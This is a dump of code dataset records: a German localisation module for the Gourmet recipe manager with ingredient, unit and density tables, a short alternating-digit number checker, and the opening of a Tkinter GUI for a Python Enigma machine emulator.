spaghetti\n (\"Penne\", \"Penne\", \"Reis & Teigwaren\"), # pasta tubes\n (\"Canelonni\", \"Canelonni\", \"Reis & Teigwaren\"), #\n (\"Fusilli\", \"Fusilli\", \"Reis & Teigwaren\"), # pasta twirls\n (\"Riccioli\", \"Riccioli\", \"Reis & Teigwaren\"), # pasta twirls\n (\"Lasagna\", \"Lasagna\", \"Reis & Teigwaren\"), # pasta sheets\n (\"Vermicelli\", \"Vermicelli\", \"Reis & Teigwaren\"), # vermicelli\n\n (\"Teig\", \"Teig\", \"Reis & Teigwaren\"), # dough\n (\"Hefeteig\", \"Teig, Hefe-\", \"Reis & Teigwaren\"), # pastry dough\n (\"Pizzateig\", \"Teig, Pizza-\", \"Reis & Teigwaren\"), # pizza dough\n\n (\"Langkornreis\", \"Reis, Langkorn-\", \"Reis & Teigwaren\"), # rice longcorn\n (\"Basmatireis\", \"Reis, Basmati-\", \"Reis & Teigwaren\"), # basmati rice\n (\"Milchreis\", \"Reis, Milch-\", \"Reis & Teigwaren\"), # pudding rice\n (\"Naturreis\", \"Reis, Natur-\", \"Reis & Teigwaren\"), # whole rice\n (\"Wildreis\", \"Reis, Wild-\", \"Reis & Teigwaren\"), # wild (black) rice\n (\"Spitzenlangkornreis\", \"Reis, Spitzenlangkorn-\", \"Reis & Teigwaren\"), # rice longcorn cook\n\n ## B r o t\n (\"Brot\", \"Brot, allgemeines\", \"Brot\"), # bread, any\n (\"Weißbrot\", \"Brot, weiß\", \"Brot\"), # white bread\n (\"Toastbrot\", \"Brot, Toast-\", \"Brot\"), # sliced white toasting bread\n (\"Vollkornbrot\", \"Brot, Vollkorn-\", \"Brot\"), # wholemeal bread\n (\"Sonnenblumenkernbrot\", \"Brot, Sonnenblumenkern-\", \"Brot\"), # sunflower seed wholmeal\n (\"Kürbiskernbrot\", \"Brot, Kürbiskern-\", \"Brot\"), # pupkin seed wholemeal\n (\"Sesambrot\", \"Brot, Sesam-\", \"Brot\"), # sesame seed wholemeal\n (\"Dreikornbrot\", \"Brot, Dreikorn-\", \"Brot\"), # 3 corn wholemeal bread\n (\"Krustenbrot\", \"Brot, Krusten-\", \"Brot\"), # Crusty wholemeal bread\n (\"Landbrot\", \"Brot, Land-\", \"Brot\"), # wholemeal bread\n (\"Fladenbrot\", \"Brot, Fladen-\", \"Brot\"), # turkish round bread\n (\"Pumpernickel\", \"Pumpernickel\", \"Brot\"), # pumpernickel bread\n\n ## K r ä u t e r u n d G e w ü r z e\n (\"Kräuter\", \"Kräuter, gemischt\", \"Gemüse\"), # mixed herbs\n (\"Petersilie\", \"Petersilie\", \"Gemüse\"), # 
parsley\n (\"schwarze Pfeffer\", \"Pfeffer schwarz\", \"Kräuter u Gewürze\"), # black pepper\n (\"Cayennepfeffer\", \"Pfeffer, Cayenne\", \"Kräuter u Gewürze\"), # cayenne\n (\"Kräuter de Provence\", \"Kräuter de Provence\", \"Kräuter u Gewürze\"), # Herbs de Provence\n (\"Kräutersalz\", \"Kräutersalz\", \"Kräuter u Gewürze\"), # Herbed salt\n (\"Lorbeerblatt\", \"Lorbeerblatt\", \"Kräuter u Gewürze\"), # Bay leaf\n (\"Gewürznelken\", \"Gewürznelken\", \"Kräuter u Gewürze\"), #\n (\"Chilipulver\", \"Chilipulver\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Curry\", \"Curry\", \"Kräuter u Gewürze\"), # curry powder\n (\"Currypaste\", \"Currypaste\", \"Kräuter u Gewürze\"), # curry paste\n (\"Madras Curry\", \"Curry, madras\", \"Kräuter u Gewürze\"), # hotter curry powder\n (\"Garam Masala\", \"Garam Masala\", \"Kräuter u Gewürze\"), #\n (\"Zimtschote\", \"Zimt, Zimtschote\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Zimt\", \"Zimt, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Korianderkerne\", \"Korianderkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Koriander\", \"Koriander, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Cuminkerne\", \"Cuminkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Cumin\", \"Cumin, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Senfkerne\", \"Senfkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Senf\", \"Senf\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Dijon-Senf\", \"Senf, Dijon\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Muskatnuss\", \"Muskatnuss\", \"Kräuter u Gewürze\"), # nutmeg\n (\"Paprika, gemahlen\", \"Paprika, gemahlen\", \"Kräuter u Gewürze\"), #\n (\"Ingwerpulver\", \"Ingwer, Ingwerpulver\", \"Kräuter u Gewürze\"), # ground ginger\n (\"Kurkuma\", \"Kurkuma\", \"Kräuter u Gewürze\"), # turmeric, curcuma\n (\"Majoran\", \"Majoran\", \"Kräuter u Gewürze\"), # turmeric, curcuma\n (\"Oregano\", \"Oregano\", \"Kräuter u Gewürze\"), # oregano\n (\"Basilikum, gerebelt\", \"Basilikum, gerebelt\", \"Kräuter u Gewürze\"), # basil, crushed\n (\"frisches Basilikum\", \"Basilikum, frisches\", \"Kräuter u Gewürze\"), # fresh basil leaves\n (\"frischer Koriander\", \"Koriander, frischer\", \"Kräuter u Gewürze\"), # fresh coriander leaves\n (\"frisches Schnittlauch\", \"Schnittlauch, frisches\", \"Kräuter u Gewürze\"), # fresh chives\n (\"frischer Ingwer\", \"Ingwer, frischer\", \"Kräuter u Gewürze\"), # fresh ginger\n (\"Ingwerpaste\", \"Ingwerpaste\", \"Kräuter u Gewürze\"), # ginger paste\n\n ## M a r m e l a d e\n (\"Pflaumenmarmelade\", \"Marmelade, Pflaumen-\", \"Konfitüren\"), # plum jam\n (\"Aprikosenmarmelade\", \"Marmelade, Aprikosen-\", \"Konfitüren\"), # apricot jam\n (\"Orangenmamalade\", \"Marmalade, Orangen-\", \"Konfitüren\"), # orange jam\n (\"Marmelade\", \"Marmelade\", \"Konfitüren\"), # jam - general\n (\"Erdbeermarmelade\", \"Marmelade, Erdbeer-\", \"Konfitüren\"), # strawberry jam\n (\"Himbeermarmelade\", \"Marmelade, Himbeer-\", \"Konfitüren\"), # raspberry jam\n (\"Erdnussbutter\", \"Erdnussbutter\", \"Konfitüren\"), # peanut butter\n (\"Nutella\", \"Nutella\", \"Konfitüren\"), # nussply\n (\"Sesammus\", \"Sesammus\", \"Konfitüren\"), # tahini - sesame spread\n (\"Honig\", \"Honig\", \"Konfitüren\"), # honey\n\n ## I n t e r n a t i o n a l\n (\"Tartex\", \"Tartex\", \"International\"), # tartex spread\n (\"Kokosmilch\", \"Kokusmilch\", \"International\"), # coconut milk\n (\"Kokoscreme\", \"Kokuscreme\", \"International\"), # coconut cream\n (\"grüne Currypaste\", 
\n (\"rote Currypaste\", \"Currypaste, rote\", \"International\"), # red curry paste\n (\"Reisessig\", \"Essig, Reis-\", \"International\"), # rice vinegar\n (\"Salsa\", \"Salsa\", \"International\"), # salsa\n (\"Sesamkerne\", \"Sesamkerne\", \"International\"), # sesame seeds\n (\"Soja-Sauce\", \"Soja-Sauce\", \"International\"), # soy sauce\n (\"Sojacreme\", \"Sojacreme\", \"International\"), # soya cream\n (\"Bulgur\", \"Bulgur\", \"International\"), # bulgur\n (\"Couscous\", \"Couscous\", \"International\"), # couscous\n (\"Falafel\", \"Falafel\", \"International\"), # falafel\n (\"Tofu\", \"Tofu\", \"International\"), # tofu\n (\"Pak-choï\", \"Pak-choï\", \"Gemüse\"), # bok choy\n\n ## M i l c h p r o d u k t e\n (\"Milch\", \"Milch\", \"Milchprodukte\"), # milk, unspecified\n (\"Käse\", \"Käse, allgemeiner\", \"Milchprodukte\"), # cheese, any\n (\"Butter\", \"Butter\", \"Milchprodukte\"), # butter\n (\"Margarine\", \"Margarine\", \"Milchprodukte\"), # margarine\n (\"Eier\", \"Eier\", \"Milchprodukte\"), # eggs\n (\"frische Milch\", \"Milch, frische\", \"Milchprodukte\"), # fresh milk\n (\"fettarme Milch\", \"Milch, fettarme\", \"Milchprodukte\"), # skimmed milk\n (\"H-Milch\", \"Milch, H-Milch\", \"Milchprodukte\"), # long-life milk\n (\"Sojamilch\", \"Milch, Sojamilch\", \"Milchprodukte\"), # soya milk\n (\"Buttermilch\", \"Milch, Buttermilch\", \"Milchprodukte\"), # buttermilk\n (\"Sauerrahm\", \"Sauerrahm\", \"Milchprodukte\"), # sour cream\n (\"Sahne\", \"Sahne\", \"Milchprodukte\"), # cream\n (\"Sahne 10% Fett\", \"Sahne, 10% Fett\", \"Milchprodukte\"), # cream, 10% fat\n (\"Sahne 15% Fett\", \"Sahne, 15% Fett\", \"Milchprodukte\"), # cream, 15% fat\n (\"Sahne 35% Fett\", \"Sahne, 35% Fett\", \"Milchprodukte\"), # cream, 35% fat\n (\"Joghurt\", \"Joghurt\", \"Milchprodukte\"), # yogurt\n (\"Quark\", \"Quark\", \"Milchprodukte\"), # quark\n (\"Speisequark Magerstufe\", \"Quark, Speise- Magerstufe\", \"Milchprodukte\"), # low-fat quark\n (\"Kräuterquark\", \"Quark, Kräuter\", \"Milchprodukte\"), # herb quark\n (\"Cheddar-Käse\", \"Käse, Cheddar\", \"Milchprodukte\"), # cheddar cheese\n (\"Hartkäse\", \"Käse, Hart-\", \"Milchprodukte\"), # general hard cheese\n (\"Hüttenkäse\", \"Käse, Hüttenkäse\", \"Milchprodukte\"), # cottage cheese\n (\"Schnittkäse\", \"Käse, Schnittkäse\", \"Milchprodukte\"), # semi-hard sliced cheese\n (\"Fetakäse\", \"Käse, Fetakäse\", \"Milchprodukte\"), # feta cheese\n (\"Ziegenkäse\", \"Käse, Ziegenkäse\", \"Milchprodukte\"), # goat cheese\n (\"Schafskäse\", \"Schafskäse\", \"Milchprodukte\"), # sheep's cheese\n (\"Emmentaler\", \"Käse, Emmentalerkäse\", \"Milchprodukte\"), # emmental\n (\"Mozzarella\", \"Käse, Mozzarella\", \"Milchprodukte\"), # mozzarella cheese\n (\"Parmesan\", \"Käse, Parmesan\", \"Milchprodukte\"), # parmesan cheese\n (\"Provolone\", \"Käse, Provolone\", \"Milchprodukte\"), # provolone cheese\n (\"Ricotta\", \"Käse, Ricotta\", \"Milchprodukte\"), # ricotta cheese\n (\"Gouda\", \"Käse, Gouda\", \"Milchprodukte\"), # Gouda cheese\n (\"Brie\", \"Käse, Brie\", \"Milchprodukte\"), # Brie cheese\n (\"Streichkäse\", \"Käse, Streich\", \"Milchprodukte\"), # spreadable cheese\n (\"Philadelphia\", \"Käse, Philadelphia\", \"Milchprodukte\"), # Philadelphia cream cheese\n\n ## h e i ß e G e t r ä n k e\n (\"schwarzer Tee\", \"Tee, schwarzer\", \"Getränke, heiß\"), # black tea\n (\"gemahlener Kaffee\", \"Kaffee, gemahlener\", \"Getränke, heiß\"), # ground coffee\n (\"gemahlener entkoffeinierter Kaffee\", \"Kaffee, gemahlener entkoffeinierter\", \"Getränke, heiß\"), # decaff ground coffee
\n (\"Kaffeefilter\", \"Kaffeefilter\", \"Getränke, heiß\"), # coffee filters\n (\"Kakao\", \"Kakao\", \"Getränke, heiß\"), # drinking chocolate\n (\"Carokaffee\", \"Carokaffee\", \"Getränke, heiß\"), # Caro coffee\n (\"Früchtetee\", \"Tee, Früchtetee\", \"Getränke, heiß\"), # fruit tea\n (\"Pfefferminztee\", \"Tee, Pfefferminztee\", \"Getränke, heiß\"), # peppermint tea\n (\"Hagebuttentee\", \"Tee, Hagebuttentee\", \"Getränke, heiß\"), # rosehip tea\n (\"Kamillentee\", \"Tee, Kamillentee\", \"Getränke, heiß\"), # camomile tea\n (\"Fencheltee\", \"Tee, Fencheltee\", \"Getränke, heiß\"), # fennel tea\n (\"Rotbuschtee\", \"Tee, Rotbuschtee\", \"Getränke, heiß\"), # rooibos tea\n (\"Kräutertee\", \"Tee, Kräutertee\", \"Getränke, heiß\"), # herbal tea\n (\"grüner Tee\", \"Tee, grüner\", \"Getränke, heiß\"), # green tea\n (\"Yogitee\", \"Tee, Yogitee\", \"Getränke, heiß\"), # yogi (ayurvedic) tea\n\n ## F l ü s s i g k e i t e n\n (\"Tafelessig\", \"Essig, Tafel-\", \"Flüssigkeiten\"), # table vinegar\n (\"Obstessig\", \"Essig, Obst-\", \"Flüssigkeiten\"), # fruit vinegar\n (\"Balsamico-Essig\", \"Essig, Balsamico-\", \"Flüssigkeiten\"), # balsamic vinegar\n (\"Sonnenblumenöl\", \"Öl, Sonnenblumenöl\", \"Flüssigkeiten\"), # sunflower oil\n (\"Olivenöl\", \"Öl, Olivenöl\", \"Flüssigkeiten\"), # olive oil\n (\"Sesamöl\", \"Öl, Sesamöl\", \"Flüssigkeiten\"), # sesame oil\n (\"Pflanzenöl\", \"Öl, Pflanzenöl\", \"Flüssigkeiten\"), # vegetable oil\n (\"Sojaöl\", \"Öl, Sojaöl\", \"Flüssigkeiten\"), # soya oil\n (\"Weißwein\", \"Wein, weiß\", \"Flüssigkeiten\"), # white wine\n (\"Rotwein\", \"Wein, rot\", \"Flüssigkeiten\"), # red wine\n\n ## t h i n g s y o u s h o u l d h a v e a t h o m e\n (\"Wasser\", \"Wasser\", \"Flüssigkeiten\") # water\n ]\n\n # THESE ARE STANDARD UNIT CONVERSIONS. You can simply translate unit names where\n # you know them. Eliminate entries that are untranslatable or don't exist in your\n # locale. And please add any additional units that you know of.\n # Each unit is of the following format:\n # (u\"unit1\",u\"unit2\"):conversion_factor, where unit1 contains conversion_factor X unit2\n # For example: 1 cup has 16 tablespoons.\n CONVERTER_TABLE = {\n (\"Tasse\", \"EL\"):16,\n (\"EL\", \"TL\"):3,\n (\"pt.\", \"Tasse\"):2,\n (\"qt.\", \"Tasse\"):4,\n (\"l\", \"ml\"):1000,\n (\"l\", \"cl\"):100,\n (\"l\", \"dl\"):10,\n (\"oz.\", \"g\"):28.35,\n (\"kg\", \"g\"):1000,\n (\"g\", \"mg\"):1000,\n (\"TL\", \"Tröpfchen\"):76,\n (\"Dose, mittel\", \"g\"):400,\n (\"Dose, groß\", \"g\"):800,\n (\"Dose, klein\", \"g\"):200,\n (\"lb.\", \"oz.\"):16,\n (\"l\", \"qt.\"):1.057\n }
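\n\n # For example, converting Tasse to EL multiplies by\n # CONVERTER_TABLE[(\"Tasse\", \"EL\")] == 16; converting in the other\n # direction divides by the stored factor.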
\n\n # DENSITIES of common foods. This allows us to convert between mass and volume.\n # Translators: You may be best off translating the food names below, since lists\n # of food densities can be hard to come by!\n DENSITY_TABLE = {\n \"Wasser\": 1, # water\n \"Traubensaft\": 1.03, # juice, grape\n \"Bouillon, Gemüse\": 1, # vegetable broth\n \"Bouillon, Hühner\": 1, # broth, chicken\n \"Milch\": 1.029, # milk\n \"Vollmilch\": 1.029, # milk, whole\n \"Milch, fettarm\": 1.033, # milk, skim\n \"Milch 2%\": 1.031, # milk, 2%\n \"Milch 1%\": 1.03, # milk, 1%\n \"Kokosmilch\": 0.875, # coconut milk\n \"Buttermilch\": 1.03, # buttermilk\n \"Schlagsahne\": 0.994, # heavy cream\n \"Sahne, leicht\": 1.012, # light cream\n \"Sahne 11,5%\": 1.025, # half-and-half\n \"Honig\": 1.420, # honey\n \"Zucker\": 1.550, # sugar, white\n \"Salz\": 2.165, # salt\n \"Butter\": 0.911, # butter\n \"Pflanzenöl\": 0.88, # oil, vegetable\n \"Olivenöl\": 0.88, # oil, olive\n \"Sonnenblumenöl\": 0.88, # oil, sunflower\n \"Sesamöl\": 0.88, # oil, sesame\n \"Mehl\": 0.6, # flour, all purpose\n \"Vollkornmehl\": 0.6, # flour, whole wheat\n \"Stärke\": 0.6, # corn starch\n \"Puderzucker\": 0.6, # sugar, powdered\n \"Staubzucker\": 0.6 # sugar, confectioners\n }\n\n ### ORIGINAL TABLES FROM ENGLISH\n\n # Standard unit names and alternate unit names that might appear. For\n # example: u\"c.\" is our standard abbreviation for cup. u\"cup\",u\"c.\" or\n # u\"cups\" might appear in a recipe we are importing. Each item of this\n # list looks like this:\n #\n # [u\"standard\", [u\"alternate1\",u\"alternate2\",u\"alternate3\",...]]\n #\n # The first item should be the preferred abbreviation\n # The second item should be the full name of the unit\n # e.g. [u\"c.\", [u\"cup\",...]]\n #\n UNITS = [\n (\"ml\", [\"Milliliter\", \"milliliter\", \"Milliliters\", \"milliliters\", \"ml\", \"ml.\"]),\n (\"cl\", [\"Centiliter\", \"centiliter\", \"Centiliters\", \"centiliters\", \"cl\", \"cl.\"]),\n (\"dl\", [\"Deciliter\", \"deciliter\", \"Deciliters\", \"deciliters\", \"dl\", \"dl.\"]),\n (\"l\", [\"Liter\", \"Liters\", \"liter\", \"liters\", \"l.\", \"lit.\", \"l\"]),\n\n (\"g\", [\"Gramm\", \"Gramme\", \"gramm\", \"gramme\", \"g.\", \"g\", \"gram\", \"grams\"]),\n (\"mg\", [\"Milligramm\", \"milligramm\", \"Milligramme\", \"milligramme\", \"mg.\", \"mg\", \"milligram\", \"milligrams\"]),\n (\"kg\", [\"Kilogramm\", \"kilogramm\", \"Kilogramme\", \"kilogramme\", \"kg.\", \"kg\", \"kilogram\", \"kilograms\"]),\n\n (\"cm\", [\"Centimeter\", \"centimeter\", \"Centimeters\", \"centimeters\", \"cm\", \"cm.\"]),\n (\"mm\", [\"Millimeter\", \"millimeter\", \"Millimeters\", \"millimeters\", \"mm\", \"mm.\"]),\n (\"m\", [\"Meter\", \"meter\", \"Meters\", \"meters\", \"m\", \"m.\"]),\n\n (\"Tröpfchen\", [\"Tröpfchen\", \"tröpfchen\", \"troepfchen\", \"Troepfchen\", \"drop\", \"drops\"]),\n (\"TL\", [\"Teelöffel\", \"Teelöffeln\", \"teelöffel\", \"teelöffeln\", \"tl\", \"TL\", \"tsp\", \"tsp.\", \"tea spoon\", \"teaspoon\"]),\n (\"EL\", [\"Esslöffel\", \"Esslöffeln\", \"esslöffel\", \"esslöffeln\", \"el\", \"EL\", \"tbs\", \"tbsp\", \"tbs.\", \"tbsp.\", \"table spoon\", \"tablespoon\"]),\n (\"Tasse\", [\"Tasse\", \"Tassen\", \"tasse\", \"tassen\", \"cup\", \"c.\", \"cups\", \"Glas\", \"glas\", \"Glass\", \"glass\"]),\n (\"Becher\", [\"Becher\", \"becher\"]),\n\n (\"St.\", [\"St.\", \"Stück\", \"Stücke\", \"Stueck\", \"Stuecke\", \"Mal\", \"stück\", \"stücke\", \"stueck\", \"stuecke\", \"mal\", \"piece\", \"pieces\", \"St\", \"st\"]),\n (\"Dose, mittel\", [\"Dose, mittel\", \"dose, mittel\", \"mittlere Dose\", \"mittlere dose\"]),
\n (\"Dose, groß\", [\"Dose, groß\", \"dose, groß\", \"große Dose\", \"große dose\"]),\n (\"Dose, klein\", [\"Dose, klein\", \"dose, klein\", \"kleine Dose\", \"kleine dose\"]),\n (\"Zeh\", [\"Zeh\", \"Zehen\", \"zeh\", \"zehen\"]), # garlic clove\n (\"Paket\", [\"Paket\", \"Pakete\", \"paket\", \"pakete\", \"Packung\", \"packung\", \"pack\"]),\n (\"Prise\", [\"Prise\", \"Prisen\", \"prise\", \"prisen\"]), # pinch\n (\"Bund\", [\"Bund\", \"Bunde\", \"bund\", \"bunde\"]), # bunch\n\n (\"lb.\", [\"Pfund\", \"pfund\", \"pound\", \"pounds\", \"lb\", \"lb.\", \"lbs.\"]),\n (\"oz.\", [\"ounce\", \"ounces\", \"oz\", \"oz.\"]),\n (\"qt.\", [\"quart\", \"qt.\", \"quarts\"]),\n (\"pt.\", [\"pint\", \"pt.\", \"pints\"]),\n (\"gallon\", [\"gallon\", \"gallons\", \"gal.\"]),\n\n ]\n\n METRIC_RANGE = (1,999)\n\n # The following sets up unit groups. Users will be able to turn\n # these on or off (American users, for example, would likely turn\n # off metric units, since we don't use them).\n # (User choice not implemented yet)\n UNIT_GROUPS = {\n 'metric mass':[('mg',METRIC_RANGE),\n ('g',METRIC_RANGE),\n ('kg',(1,None))],\n 'metric volume':[('ml',METRIC_RANGE),\n ('cl',(1,99)),\n ('dl',(1,9)),\n ('l',(1,None)),],\n 'imperial weight':[('oz.',(0.25,32)),\n ('lb.',(0.25,None)),\n ],\n 'imperial volume':[('Tröpfchen',(0,3)),\n ('TL',(0.125,3)),\n ('EL',(1,4)),\n ('Tasse',(0.25,6)),\n ('pt.',(1,1)),\n ('qt.',(1,3))]\n }\n\n # The units here need to correspond to the standard unit names defined\n # above in UNITS\n CROSS_UNIT_TABLE = {\n ## This is for units that require an additional\n ## bit of information -- i.e. to convert between\n ## volume and mass you need the density of an\n ## item. In these cases, the additional factor\n ## will be provided as an 'item' that is then looked\n ## up in the dictionary referenced here (i.e. the density_table)\n ## currently, 'density' is the only keyword used\n (\"pt.\", \"lb.\") :('density',1),\n (\"EL\", \"oz.\") :('density',0.5),\n (\"Tasse\", \"oz.\"):('density',8),\n (\"l\", \"kg\") :('density',1),\n (\"ml\", \"g\") :('density',1),\n }
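\n\n # Sketch of how a 'density' conversion composes (illustration only, not\n # code from this module): 2 Tasse of Mehl -> oz. would combine\n # CROSS_UNIT_TABLE[(\"Tasse\", \"oz.\")] == ('density', 8) with\n # DENSITY_TABLE[\"Mehl\"] == 0.6, i.e. 2 * 8 * 0.6 = 9.6 oz.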
\n\n # The units here need to correspond to the standard unit names defined\n # in UNITS. These are some core conversions from mass-to-volume,\n # assuming a density of 1 (i.e. the density of water).\n VOL_TO_MASS_TABLE = {\n (\"pt.\", \"lb.\") : 1,\n (\"EL\", \"oz.\") : 0.5,\n (\"Tasse\", \"oz.\") : 8,\n (\"pt.\", \"oz.\") : 16,\n (\"ml\", \"g\") : 1,\n (\"ml\", \"mg\") : 1000,\n (\"ml\", \"kg\"): 0.001,\n (\"cl\", \"kg\"): 0.01,\n (\"cl\", \"g\") : 10,\n (\"dl\", \"kg\") : 0.1,\n (\"dl\", \"g\") : 100,\n (\"l\", \"kg\") : 1\n }\n\n ### From translator :\n ### FRENCH PART TO BE REVISED !!! US units != UK units != Canadian units !!!\n ### I will work on these later...\n # VOL_TO_MASS_TABLE = {\n # (u\"chop\",u\"lb\") : 1, #(warning, might not be accurate, see below)\n # (u\"c. à table\",u\"oz\") : 0.5,\n # (u\"tasse\",u\"oz\") : 8,\n # (u\"chop\",u\"oz\") : 20, #(warning, modified, see u\"chopine\" in granddictionnaire)\n # (u\"ml\",u\"g\") : 1,\n # (u\"ml\",u\"mg\") : 1000,\n # (u\"ml\",u\"kg\"): 0.001,\n # (u\"cl\",u\"kg\"): 0.01,\n # (u\"cl\",u\"g\") : 10,\n # (u\"dl\",u\"kg\") : 0.1,\n # (u\"dl\",u\"g\") : 100,\n # (u\"l\",u\"kg\") : 1}\n\n # TIME ABBREVIATIONS (this is new!)\n TIME_ABBREVIATIONS = {\n 'sec':'Sek.',\n 'min':'Min.',\n 'hr':'Std.'\n }\n\n IGNORE = [\"und\",\"mit\",\"von\",\"für\",\n \"kalt\",\"kalter\",\"kalte\",\"kaltes\",\"kalten\",\n \"warm\",\"warmer\",\"warme\",\"warmes\",\"warmen\",\n \"dünn\",\"dünner\",\"dünne\",\"dünnes\",\"dünnen\",\n \"dick\",\"dicker\",\"dicke\",\"dickes\",\"dicken\"\n ]\n\n NUMBERS: Mapping[float, Collection[str]] = {\n }\n\n # These functions are rather important! Our goal is simply to\n # facilitate look ups -- if the user types in u\"tomatoes\", we want to\n # find \"tomato.\" Note that the strings these functions produce will\n # _never_ be shown to the user, so it's fine to generate nonsense\n # words as well as correct answers -- our goal is to generate a list\n # of possible hits rather than to get the plural/singular form \"right\".\n\n @staticmethod\n def guess_singulars (s):\n # Note - German, here we're not only going to try to make nouns singular,\n # we could also get an adjective, so let's also take the adjectival endings off\n if len(s)<3: return []\n ret = []\n if s[-1]=='n':\n if s[-2]=='e':\n ret.append(s[0:-2]) # try chopping off 'en'\n if (s[-2]!='u') and (s[-2]!='o') and (s[-2]!='a') and (s[-2]!='i'):\n ret.append(s[0:-1]) # try chopping off the n\n\n if s[-1]=='s':\n ret.append(s[0:-1]) # try chopping off the s\n if s[-2]=='e':\n ret.append(s[0:-2]) # try chopping off 'es'\n\n if s[-1]=='e':\n ret.append(s[0:-1]) # try chopping off the 'e'\n\n if (s[-1]=='r') and (s[-2]=='e'):\n ret.append(s[0:-2]) # try chopping off the 'er'\n\n return ret\n\n @staticmethod\n def guess_plurals (s):\n # Ditto above, assume this could also be an adjective, so try adding the common agreements\n return [s+'n', s+'en', s+'e', s+'er', s+'s', s+'es']\n","repo_name":"thinkle/gourmet","sub_path":"gourmet/defaults/defaults_de.py","file_name":"defaults_de.py","file_ext":"py","file_size_in_byte":55915,"program_lang":"python","lang":"en","doc_type":"code","stars":342,"dataset":"github-code","pt":"43"} +{"seq_id":"33887171120","text":"def check(n):\n # An alternating number here: odd length, the first digit differs from the\n # second, the first digit equals the last, and the digits alternate.\n if len(n)%2==0: return 0\n if n[0]==n[1]: return 0\n if n[0]!=n[-1]: return 0\n for i in range(2,len(n),2):\n if n[0]!=n[i]: return 0\n # also require every odd position to match the second digit (assumption:\n # the problem wants exactly two digits strictly alternating)\n for i in range(3,len(n),2):\n if n[1]!=n[i]: return 0\n return 1\nfor i in range(int(input())):\n n = input()\n if check(n): print(\"YES\")\n else: print(\"NO\")","repo_name":"HPhuonghub/Python-Code-Ptit","sub_path":"PY01055 SỐ XEN KẼ.py","file_name":"PY01055 SỐ XEN KẼ.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74548221568","text":"\"\"\"An implementation of the Enigma Machine in Python.\n\nThis is a toy project intending to implement the Enigma Machine as originally\ndesigned by Arthur Scherbius. Enigma was an electromechanical implementation of\na polyalphabetic substitution cypher. It's no longer considered\ncryptographically secure, but the device itself was fairly interesting.\n\nNo effort has been made to correct any of the cryptographic flaws in enigma;\nthis implementation is meant to be as faithful as possible. Additionally,
\nsteps have been taken to attempt to emulate not just the Wehrmacht enigma, but\nthe commercial models as well. Finally, while a large number of rotor\nbindings can be found in the provided catalog.json, the list is not exhaustive,\nand the module makes no effort to enforce the use of \"matching\" rotors.\n\nDevelopment was by Zac Adam-MacEwen. See the README.md for details.\n\n\"\"\"\n\n__version__ = \"1.2.0Dev\"\n\nfrom . import enigma\nfrom tkinter import *\nimport webbrowser\n\n# We really only need things to execute here if being called as main, such as `python -m python_enigma`\n\n\ndef test_button(): # TODO Remove when no longer relied upon\n print(\"Button Works!\")\n return\n\n\ndef display_about_window():\n about_window = Toplevel(window)\n box = LabelFrame(about_window, text=\"About Python Enigma\")\n about_blurb = \"This is a toy project intending to implement the Enigma Machine as originally \" \\\n \"designed by Arthur Scherbius. Enigma was an electromechanical implementation of \" \\\n \"a polyalphabetic substitution cypher. It's no longer considered \" \\\n \"cryptographically secure, but the device itself was fairly interesting.\\n\\n\" \\\n \"No effort has been made to correct any of the cryptographic flaws in enigma; \" \\\n \"this implementation is meant to be as faithful as possible. Additionally, \" \\\n \"steps have been taken to attempt to emulate not just the Wehrmacht enigma, but \" \\\n \"the commercial models as well.\\n\\nFurther information is available using the links below.\" \\\n \"\\n\\nThis is a work product of Kensho Security Labs,\" \\\n \" provided under the Apache 2.0 License.\"\n box.grid(row=0, column=0)\n text = Message(box, text=about_blurb, width=500)\n text.pack()\n ks_button = Button(box, text=\"Kensho Security Labs\", command=launch_kenshosec, width=15)\n gh_button = Button(box, text=\"Github Project Page\", command=launch_github, width=15)\n gh_button.pack()\n ks_button.pack()\n\n\ndef fill_wheel_states():\n wheel_state_raw = machine_used.wheel_pack.rotors.copy()\n wheel_state_raw.reverse() # wheels will now appear in visible order, as indexed.\n counter = 1\n for rotor in wheel_state_raw: # we can iterate over these to start filling the parent.\n readable_pos = enigma.num_to_alpha(rotor.position)\n wheel_id = rotor.name\n ringstellung = rotor.ringstellung\n new_wheel = LabelFrame(wheel_states, width=25, height=25, text=(\"%s\" % str(counter)))\n new_wheel.pack(side=LEFT)\n pos_var = StringVar()\n pos_var.set(readable_pos)\n pos_label = Label(new_wheel, text=\"Position:\")\n pos_label.grid(row=0, column=0)\n wheel_label = Label(new_wheel, text=\"Wheel:\")\n wheel_label.grid(row=0, column=1)\n wheel_position_setting = Entry(new_wheel, width=1, textvariable=pos_var)\n wheel_position_setting.grid_propagate(0)\n wheel_position_setting.grid(row=1, column=0)\n wheel_type = Label(new_wheel, text=wheel_id)\n wheel_type.grid(row=1, column=1)\n rings_label = Label(new_wheel, text=\"Ringstellung:\")\n rings_setting = Label(new_wheel, text=ringstellung)\n rings_label.grid(row=2, column=0)\n rings_setting.grid(row=2, column=1)\n counter += 1\n\n\ndef initialize_stock_enigma():\n use_these = [(\"Beta\", \"A\"), (\"I\", \"A\"), (\"II\", \"A\"), (\"III\", \"A\")]\n machine = enigma.Enigma(catalog=\"default\", stecker=None, stator=\"military\", rotors=use_these, reflector=\"UKW\",\n operator=True, word_length=5, ignore_static_wheels=False)\n return machine\n\n\ndef launch_kenshosec():\n webbrowser.open(\"https://www.kenshosec.com/Projects\")
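\n # webbrowser.open launches the system default browser and returns\n # right away, so the Tk mainloop is not blocked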
